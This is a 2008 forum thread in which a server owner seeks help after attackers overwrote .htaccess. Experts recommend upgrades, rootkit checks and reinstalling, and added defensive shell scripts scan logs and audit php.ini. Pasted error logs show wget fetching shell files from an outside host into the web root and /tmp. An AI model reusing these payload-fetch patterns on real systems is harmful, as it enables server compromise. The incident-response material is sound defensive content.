Solved

Server hacked, .htaccess file was changed

Posted on 2008-06-24
740 Views
Last Modified: 2013-11-15
Hi experts,

I have a dedicated server with GoDaddy. It was attacked 3 times this morning. The .htaccess file on the server was modified and redirected to another IP: 64.28.191.117. It seems they are able to write anything to my server.
The following is the error log I got. It seems to be very helpful, but I still cannot figure out what the hole is and what I should do. Thanks a lot!

[-] prtctl: Invalid argument
[-] prtctl: Invalid argument
--06:09:21--  http://www.dr-schwab.de/shell2.txt
           => `/home/myweb/public_html/.htaccess'
Resolving www.dr-schwab.de... 82.165.104.215
Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 210 [text/plain]
 
    0K                                                       100%   33.38 MB/s
 
06:09:21 (33.38 MB/s) - `/home/myweb/public_html/.htaccess' saved [210/210]


Question by:z_ruixiang
15 Comments
 
LVL 10

Expert Comment

by:Casey Herman
ID: 21856284
If this is some sort of NIX you can change your permission on the file to read only.

Casey
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21856374
That doesn't help if there is an application that is vulnerable.

Are you using PHP?  What version?  What version of Apache?

Has GoDaddy been notified?
 
LVL 10

Expert Comment

by:Casey Herman
ID: 21856459
That is right because you can write code to change the file modes....

Casey

Author Comment

by:z_ruixiang
ID: 21856566
I have changed all the files to read only, but it didn't help.
Apache/2.0.52  running on CentOS 4.
PHP Version 4.3.9
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21856630
Upgrade Apache and PHP.  Run modsecurity.  Don't walk to the task, run -- before it is too late.
 

Author Comment

by:z_ruixiang
ID: 21856736
Will this upgrading really help? Do I need to change my code if upgraded to PHP5?
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21856899
If you are running a release of PHP or whatever that has a security vulnerability, then, YES, you need to upgrade.  If you don't want to go to PHP5, then upgrade to the latest PHP4.  And upgrade Apache while you're at it.  Install modsecurity v2.  Review your apache config file and don't load modules such as proxying, etc if you don't need or use them.
 

Author Comment

by:z_ruixiang
ID: 21857153
Based on the log info, can we tell whether it's because of the Apache or PHP version? I mean, I really want to know what and where the hole is, how they could write on my server.
 
LVL 28

Accepted Solution

by:
Jan Springer earned 500 total points
ID: 21857372
I'd put my 2 cents on php.  Some interesting reading:

http://isisblogs.poly.edu/2008/02/23/reverse-engineering-a-php-virus/

If it were my machine, I'd scratch it and start over.  But do check that a root kit hasn't been installed -> www.chkrootkit.org.  Look in /tmp for applications and/or data that do not belong.
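The accepted answer suggests looking in the log and in /tmp for things that do not belong. The script below is an added example written for this page, not code from the thread or from any of the participants: it pulls wget-style download transcripts (the "--HH:MM:SS--  URL" / "=> `path'" pairs pasted in the question) out of an error log and flags transfers whose destination is a temp directory or a .htaccess file. The sample log is constructed from the lines in the question; the logo.png transfer and the example.com URL are made up to show a benign download being filtered out.

```shell
#!/bin/sh
# Added example (not from the thread): find wget download transcripts in an
# Apache error log and flag the ones landing in temp directories or .htaccess.

# Constructed sample, modelled on the lines pasted in the question. The
# logo.png / example.com transfer is invented to show a benign download.
sample_log() {
  cat <<'EOF'
[-] prtctl: Invalid argument
--06:03:54--  http://www.dr-schwab.de/shell3.c
           => `/tmp/sys.c'
Resolving www.dr-schwab.de... 82.165.104.215
HTTP request sent, awaiting response... 200 OK
06:03:55 (21.04 KB/s) - `/tmp/sys.c' saved [3226/3226]
--06:05:10--  http://www.example.com/logo.png
           => `/home/myweb/public_html/images/logo.png'
HTTP request sent, awaiting response... 200 OK
--06:09:21--  http://www.dr-schwab.de/shell2.txt
           => `/home/myweb/public_html/.htaccess'
HTTP request sent, awaiting response... 200 OK
06:09:21 (33.38 MB/s) - `/home/myweb/public_html/.htaccess' saved [210/210]
EOF
}

# Read a log on stdin and emit one "URL -> destination" line per transfer.
# wget prints "--HH:MM:SS--  URL" followed by "=> `path'"; the backtick and
# quote are stripped first so awk sees the bare path as its second field.
extract_downloads() {
  tr -d "\`'" | awk '
    /^--[0-9:]+--/ { url = $2; next }
    /^ *=> /       { print url " -> " $2 }
  '
}

# Keep only destinations that should never be written by the web server:
# world-writable temp directories and a .htaccess anywhere under the web root.
flag_suspicious() {
  awk '
    $3 ~ /^\/(var\/)?tmp\// || $3 ~ /^\/dev\/shm\// || $3 ~ /\/\.htaccess$/
  '
}

# Stand-alone use on a real log (path is the usual CentOS location, adjust as needed):
#   extract_downloads < /var/log/httpd/error_log | flag_suspicious
sample_log | extract_downloads | flag_suspicious
```

Run against the sample, the script reports the /tmp/sys.c and .htaccess downloads and drops the image. A destination list like this, combined with `ls -la /tmp` and the chkrootkit run the answer recommends, gives a concrete list of files to examine before deciding whether the box can be trusted at all.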
 

Author Comment

by:z_ruixiang
ID: 21857700
I think you are right. I found this in error log:

--06:03:54--  http://www.dr-schwab.de/shell3.c
           => `/tmp/sys.c'
Resolving www.dr-schwab.de... 82.165.104.215
Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,226 (3.2K) [text/x-csrc]

    0K ...                                                   100%   21.04 KB/s

06:03:55 (21.04 KB/s) - `/tmp/sys.c' saved [3226/3226]

And there is an unknown file in my /tmp

Is it a security vulnerability of the PHP I have? I will upgrade it.
 

Author Comment

by:z_ruixiang
ID: 21857755
Could you give me some instruction on how to upgrade to php5?
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21857886
The problem with this is that applications could have been re-compiled by the hacker and you most likely have no idea which apps these are.

Move your webserver temporarily somewhere else and re-install is my suggestion.
 

Author Comment

by:z_ruixiang
ID: 21857961
I ran "yum update php", but it seems 4.3.9 is the latest version I can get.
 

Author Comment

by:z_ruixiang
ID: 21877321
What should I do to prevent it from being attacked if I get a new server? I'm not sure whether they still do that if I move to a totally new server.
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21877468
1) install all of the latest versions of kernel and apps
2) keep a spreadsheet of current OS and application versions installed
3) subscribe to bugtraq at www.securityfocus.com
4) run modsecurity v2 with Apache 2.2.x
5) use iptables
6) periodically update and run chkrootkit -> www.chkrootkit.org
7) turn globals off in php
8) sanitize input variables to scripts and cgis
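Item 7 of the list above ("turn globals off in php") refers to the `register_globals` directive. The script below is an added example for this page, not code from the thread: it audits a php.ini on stdin for `register_globals` and three other PHP 4/5-era directives that are worth pinning to Off on an exposed server (`allow_url_fopen`, `display_errors`, `expose_php`), reporting each as OK, RISK or MISSING. The directive names are real php.ini keys; both sample ini excerpts are constructed. Note that `allow_url_fopen = Off` also stops legitimate code from opening http:// URLs with fopen() or include(), so check the application before changing it.

```shell
#!/bin/sh
# Added example (not from the thread): report php.ini directives that are
# still On when a hardened web server would have them Off.

# Real php.ini directive names; the audit expects each to be Off/0.
RISKY_KEYS="register_globals allow_url_fopen display_errors expose_php"

# Read php.ini on stdin; print one line per checked key: OK, RISK or MISSING.
# Handles "; comment" lines, trailing comments, tabs and quoted values.
audit_php_ini() {
  awk -v keys="$RISKY_KEYS" '
    {
      line = $0
      gsub(/\t/, " ", line)
      sub(/;.*$/, "", line)             # drop full-line and trailing comments
      if (line ~ /^ *$/) next
      eq = index(line, "=")
      if (eq == 0) next
      key = substr(line, 1, eq - 1)
      val = substr(line, eq + 1)
      gsub(/^ +| +$/, "", key)
      gsub(/"/, "", val)
      gsub(/^ +| +$/, "", val)
      seen[key] = tolower(val)
    }
    END {
      n = split(keys, want, " ")
      for (i = 1; i <= n; i++) {
        k = want[i]
        if (!(k in seen)) { print "MISSING " k; continue }
        v = seen[k]
        if (v == "off" || v == "0" || v == "") print "OK " k " = " v
        else                                   print "RISK " k " = " v
      }
    }'
}

# Constructed excerpt in the state a neglected PHP 4 server often sits in.
lax_ini() {
  cat <<'EOF'
; constructed sample, not a real server's file
register_globals = On
display_errors = On
allow_url_fopen = On       ; lets fopen()/include() fetch http:// URLs
expose_php = Off
EOF
}

# The same keys after hardening (also constructed).
hardened_ini() {
  cat <<'EOF'
register_globals = Off
display_errors = Off
log_errors = On
allow_url_fopen = Off
expose_php = Off
EOF
}

# Stand-alone use on a real file: audit_php_ini < /etc/php.ini
lax_ini | audit_php_ini
hardened_ini | audit_php_ini
```

The lax excerpt yields three RISK lines and one OK; the hardened excerpt yields four OK lines. Keeping the audit in the version spreadsheet mentioned in item 2 makes it easy to re-run after every `yum update` of the PHP packages, since a package upgrade can ship a new php.ini with defaults that differ from the one you hardened.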
